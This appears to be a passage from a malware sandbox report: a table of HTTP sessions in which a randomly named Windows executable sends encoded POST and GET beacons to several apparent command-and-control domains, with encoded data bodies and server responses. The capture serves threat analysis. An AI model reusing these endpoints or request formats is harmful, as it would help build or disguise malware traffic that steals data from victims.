                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.roopiedutech.online
                                                                        Referer: http://www.roopiedutech.online/7ozt/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        20 | 192.168.2.5 | 50000 | 103.191.208.137 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:43.312668085 CET | 362 | OUT | GET /7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdappGAEB9CQAwJ1/7vpTPOyeunU+wS9pROO2BCMLDVBWEVc4ObTViQoI1sZt/u29nLO6JUpw==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.roopiedutech.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:46.135535955 CET | 536 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        x-redirect-by: WordPress
                                                                        location: http://roopiedutech.online/7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdappGAEB9CQAwJ1/7vpTPOyeunU+wS9pROO2BCMLDVBWEVc4ObTViQoI1sZt/u29nLO6JUpw==&yx-=dF9dYX9pQR-xIhFp
                                                                        x-litespeed-cache: miss
                                                                        content-length: 0
                                                                        date: Thu, 07 Nov 2024 09:11:45 GMT
                                                                        server: LiteSpeed
                                                                        vary: User-Agent


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        21 | 192.168.2.5 | 50001 | 183.90.181.102 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:52.456267118 CET | 606 | OUT | POST /c52l/ HTTP/1.1
                                                                        Host: www.seikai.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seikai.click
                                                                        Referer: http://www.seikai.click/c52l/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:53.500350952 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        wpo-cache-status: not cached
                                                                        wpo-cache-message: The request method was not GET (POST)
                                                                        link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"
                                                                        transfer-encoding: chunked
                                                                        content-encoding: br
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 09:11:53 GMT
                                                                        server: LiteSpeed


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        22 | 192.168.2.5 | 50002 | 183.90.181.102 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:55.008482933 CET | 626 | OUT | POST /c52l/ HTTP/1.1
                                                                        Host: www.seikai.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seikai.click
                                                                        Referer: http://www.seikai.click/c52l/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:56.038858891 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        wpo-cache-status: not cached
                                                                        wpo-cache-message: The request method was not GET (POST)
                                                                        link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"
                                                                        transfer-encoding: chunked
                                                                        content-encoding: br
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 09:11:55 GMT
                                                                        server: LiteSpeed


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        23 | 192.168.2.5 | 50003 | 183.90.181.102 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:11:57.554179907 CET | 1643 | OUT | POST /c52l/ HTTP/1.1
                                                                        Host: www.seikai.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seikai.click
                                                                        Referer: http://www.seikai.click/c52l/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:58.649674892 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        wpo-cache-status: not cached
                                                                        wpo-cache-message: The request method was not GET (POST)
                                                                        link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"
                                                                        transfer-encoding: chunked
                                                                        content-encoding: br
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 09:11:58 GMT
                                                                        server: LiteSpeed


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        24 | 192.168.2.5 | 50004 | 183.90.181.102 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:00.099173069 CET | 355 | OUT | GET /c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6+mgIULDdoE9y629/Yed0CV4AMnOIzXEmhgnpyaCJF/2Tl+LMvC2Uf6a/XdOYn+kCA+BMl9RbhA==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.seikai.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:01.101988077 CET | 633 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        wpo-cache-status: not cached
                                                                        wpo-cache-message: In the settings, caching is disabled for matches for one of the current request's GET parameters
                                                                        x-redirect-by: WordPress
                                                                        location: http://seikai.click/c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6+mgIULDdoE9y629/Yed0CV4AMnOIzXEmhgnpyaCJF/2Tl+LMvC2Uf6a/XdOYn+kCA+BMl9RbhA==&yx-=dF9dYX9pQR-xIhFp
                                                                        content-length: 0
                                                                        date: Thu, 07 Nov 2024 09:12:00 GMT
                                                                        server: LiteSpeed


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        25 | 192.168.2.5 | 50005 | 67.223.117.142 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:06.677499056 CET | 600 | OUT | POST /saaz/ HTTP/1.1
                                                                        Host: www.jorbaq.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.jorbaq.top
                                                                        Referer: http://www.jorbaq.top/saaz/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:07.339900017 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:07 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        26 | 192.168.2.5 | 50006 | 67.223.117.142 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:09.226202965 CET | 620 | OUT | POST /saaz/ HTTP/1.1
                                                                        Host: www.jorbaq.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.jorbaq.top
                                                                        Referer: http://www.jorbaq.top/saaz/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:09.891572952 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:09 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        27 | 192.168.2.5 | 50007 | 67.223.117.142 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:11.773761034 CET | 1637 | OUT | POST /saaz/ HTTP/1.1
                                                                        Host: www.jorbaq.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.jorbaq.top
                                                                        Referer: http://www.jorbaq.top/saaz/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:12.447926998 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:12 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        28 | 192.168.2.5 | 50008 | 67.223.117.142 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:14.323975086 CET | 353 | OUT | GET /saaz/?N6gPj2W=E1XhlXFLcWuCDIBP8to2tuUVnSemexwJ48Ab55V5HKBvWu90vpvIEGRMt7lYWMU5NPNXOFUjE36KCHhW/fBhyMiphohAP4glwjROtQZlzRCPRSaJk41pBGj4Bhn1O6AIFQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.jorbaq.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:14.994524002 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:14 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        29 | 192.168.2.5 | 50009 | 206.119.81.36 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:20.481391907 CET | 597 | OUT | POST /w6i7/ HTTP/1.1
                                                                        Host: www.neg21.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.neg21.top
                                                                        Referer: http://www.neg21.top/w6i7/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:21.403739929 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 09:12:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        30 | 192.168.2.5 | 50010 | 206.119.81.36 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:23.068267107 CET | 617 | OUT | POST /w6i7/ HTTP/1.1
                                                                        Host: www.neg21.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.neg21.top
                                                                        Referer: http://www.neg21.top/w6i7/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=+dTWE30wpsAAvzdsw0NIL4aWhzyv0R1fa2OcU5ZGnt+AS2IRThWDn5uEZWBjzWEx8uScgOPZBCa3EqQDzDa9pAm1rddIvOfHE9TzQJOOzYoM/5ahGzCJ2FbkQHh9n5/o8A2eHOy22QMI9IT1IoOeQbfAUIzQ6Uyf/L6VRdCuxYgiyp4CNJrTNAU8/CNjoD7rDqIkm/Wkcw0ApCZyYj1pFm2+Bd0E
                                                                        Nov 7, 2024 10:12:23.963917017 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 09:12:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        31 | 192.168.2.5 | 50011 | 206.119.81.36 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:25.629606962 CET | 1634 | OUT | POST /w6i7/ HTTP/1.1
                                                                        Host: www.neg21.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.neg21.top
                                                                        Referer: http://www.neg21.top/w6i7/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W= [TRUNCATED]
                                                                        Nov 7, 2024 10:12:26.574258089 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 09:12:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        32 | 192.168.2.5 | 50012 | 206.119.81.36 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:28.173502922 CET | 352 | OUT | GET /w6i7/?N6gPj2W=zf72HCwdm90Brz0/xWE1IYSOiQ3p3A59Q1iHXpkTu9OkdWFvcQX+8+iDJHR0+30T1teAh9aKH0eMHZRU0BnG1yy/rK5I2oPmb97GAfqKy80sg6qoYznK3DHqFQwxpou29A==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.neg21.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:29.106376886 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 09:12:28 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        33 | 192.168.2.5 | 50013 | 84.32.84.32 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:34.425335884 CET | 627 | OUT | POST /2k8c/ HTTP/1.1
                                                                        Host: www.suerteconysa.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.suerteconysa.online
                                                                        Referer: http://www.suerteconysa.online/2k8c/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=GPUc6wmlpUZmvmBdF7Tc1K3zsTbYP2R8WNjeFTWmg1aKy71JJd8Jc20dx/HniFuQ6JsP0zBrjJCiWCdbxaL0DoQYI4T/GBxPLHKdWp2t1RwKrXZaiGTmXCu0mT2u57pncJRoXcDZuDAynxhBaha086VZGLVYL1GAcl9/advIyzv86NYcPfqWnRUr8QSme2QjDshvfsI=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        34 | 192.168.2.5 | 50014 | 84.32.84.32 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:36.984169006 CET | 647 | OUT | POST /2k8c/ HTTP/1.1
                                                                        Host: www.suerteconysa.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.suerteconysa.online
                                                                        Referer: http://www.suerteconysa.online/2k8c/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=GPUc6wmlpUZmvHxdDY7c563ygzbYAWR4WMfeFWm2jB2KxaFJIc8JQW0dlvH+vlub6Jh60xFrjJWiWDtbxtX3C4QedoTqCBxPLHKdWpiU1RYKokRazTzleiu3hT2uzbprcJQFXe33uBIynxRBZwa1z6Vfb7VOInfHaEhXfL2fhC7X2bp2V9i+0x4TsDaRPGxKZPxfB7cMCbB08aXf/QF/lFshF+5D


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        35 | 192.168.2.5 | 50015 | 84.32.84.32 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:39.535459995 CET | 1664 | OUT | POST /2k8c/ HTTP/1.1
                                                                        Host: www.suerteconysa.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.suerteconysa.online
                                                                        Referer: http://www.suerteconysa.online/2k8c/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        36 | 192.168.2.5 | 50016 | 84.32.84.32 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:42.078824043 CET | 362 | OUT | GET /2k8c/?N6gPj2W=LN885FCenV0arV5pDJ6h3a+LwxHrBQx0V+LnHznGnxO866p5HdYgFA4Q1Lryskeb84lUzgc9oK+kYxVS/Lu8euZMIM/0QxNAF1muDsae+W878EIY9SjqXiybtD+r8qgxLw==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.suerteconysa.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:42.889725924 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Server: hcdn
                                                                        Date: Thu, 07 Nov 2024 09:12:42 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 10072
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        x-hcdn-request-id: 9bd01ea1df2fb806607c17976857b318-int-edge2
                                                                        Expires: Thu, 07 Nov 2024 09:12:41 GMT
                                                                        Cache-Control: no-cache
                                                                        Accept-Ranges: bytes
                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        37 | 192.168.2.5 | 50017 | 195.110.124.133 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:12:48.123222113 CET | 624 | OUT | POST /xtuc/ HTTP/1.1
                                                                        Host: www.nutrigenfit.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.nutrigenfit.online
                                                                        Referer: http://www.nutrigenfit.online/xtuc/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Ascii: N6gPj2W=qnTAPNuVSRwUcrL2pG8mtCOFBeq52EMz9mySEK7FeBUtCD1nTrZBzBvLKcn/zHmr8eQ71YbPaMQsNqwCeNaXFnYHEpvdkq4CYn40EleEY4TNHRZN74fOU6aEnnMhXkpBoiIOjGOJfhIFAkcbcJARtfjeLqL7Mko8QVzMypeN7YfrnxJrfMqBI+6RGQOIY/GL0NG/ZHU=

                                                                        Timestamp: Nov 7, 2024 10:12:48.947371960 CET
                                                                        Bytes transferred: 367
                                                                        Direction: IN
                                                                        Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:48 GMT
                                                                        Server: Apache
                                                                        Content-Length: 203
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
